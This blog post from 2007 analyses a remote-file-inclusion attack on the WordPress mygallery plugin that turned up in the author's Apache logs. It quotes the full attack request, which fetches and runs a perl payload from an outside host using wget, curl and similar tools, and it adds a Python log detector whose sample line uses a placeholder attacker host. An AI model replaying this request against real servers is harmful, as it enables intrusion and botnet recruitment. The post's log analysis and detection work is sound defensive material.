WordPress Exploit Appearing in Apache Logs

Written by James McDonald

July 8, 2007

This appeared in my Apache logs this morning:

//wp-content/plugins/mygallery/myfunctions ... rm%20-rf%20kk*?: 1 Time(s)

Looking back through the logs, the full request was:
//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=
http://koeh.t35.com/ptjz/root.gif?
&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/leto/kk.txt;wget%20
http://tw0team.name/leto/kk.txt;fetch%20http://tw0team.name/leto/kk.txt;curl%20-O%20
http://tw0team.name/leto/kk.txt;perl%20kk.txt;rm%20-rf%20kk*?
HTTP/1.1" 404 11561 "-" "libwww-perl/5.803"

As can be seen from the request, it is supposed to pull in a remote file (root.gif) through the myPath parameter and then, via the cmd parameter, try one download tool after another (lwp-download, wget, fetch, curl) to fetch kk.txt into /tmp, run it with perl and delete it again.
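As an added example (not part of the original post), here is a small Python detector that scans Apache combined-format log lines for the two features of this request: a parameter whose whole value is a remote URL (the myPath inclusion) and a parameter carrying a shell command chain (cmd). The sample log lines and the attacker.example host are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format. The second line has the
# same shape as the request quoted above, with the real hosts replaced by
# attacker.example (a placeholder).
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jul/2007:06:12:01 +1000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [08/Jul/2007:06:14:33 +1000] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://attacker.example/root.gif?&cmd=cd%20/tmp;wget%20http://attacker.example/kk.txt;perl%20kk.txt;rm%20-rf%20kk* HTTP/1.1" 404 11561 "-" "libwww-perl/5.803"
203.0.113.7 - - [08/Jul/2007:06:15:10 +1000] "GET /wp-content/plugins/mygallery/gallery.php?id=3 HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter whose whole value is a URL is the classic remote-file-inclusion shape.
REMOTE_URL_RE = re.compile(r'^\s*(https?|ftp)://', re.I)
# Shell separators or download/execute tool names inside a parameter value.
SHELL_RE = re.compile(r'[;|`]|\$\(|\b(wget|curl|fetch|lwp-download|perl|rm)\b', re.I)

def analyse_line(line):
    """Return a hit dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Split on the first '?' by hand: urlsplit() would treat the leading "//" in
    # the request target as a host name and lose the path.
    path, _, query = m.group("target").partition("?")
    reasons = []
    for pair in query.split("&"):          # split on '&' only; ';' is part of the payload
        name, _, raw = pair.partition("=")
        value = unquote(raw)               # decode %20 etc. before matching
        if REMOTE_URL_RE.match(value):
            reasons.append(f"remote URL in parameter {name!r}")
        if SHELL_RE.search(value):
            reasons.append(f"shell command in parameter {name!r}")
    if not reasons:
        return None
    # The status matters for triage: a 404 (as in the post) means the plugin file
    # was not there, so the attempt failed; a 200 deserves immediate follow-up.
    return {"ip": m.group("ip"), "path": path, "status": int(m.group("status")),
            "ua": m.group("ua"), "reasons": reasons}

def scan(log_text):
    """Run analyse_line over every line of a log and return the hits."""
    return [h for h in map(analyse_line, log_text.splitlines()) if h]
```

Run `scan()` over an access log and look first at any hit whose status is 200, since those are the requests that reached a file that actually existed.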

I have been looking at what are known as botnets, a contraction of roBOT NETworks: literally thousands of computers exploited to be used by criminal gangs for spam and DDoS attacks.

There is a US Gov website (I can’t find the link at the moment) which says that there are over a million compromised computers in use by various criminal organizations.

So if you have an internet-connected computer you may find you are subject to these attacks whether you know about it or not. There are many websites that tell you how to secure your computer.

Doing nothing is a good way of giving someone the contents of your online bank accounts.

My advice for WordPress users: if you have the mygallery plugin, check the security information at wordpress.org, and if you can’t find anything about a fix or patch, remove it immediately.

1 Comment

  1. Sofie

    It seems not only to be a WP exploit but the backdoor also distributes itself on IRC networks (Internet Relay Chat).

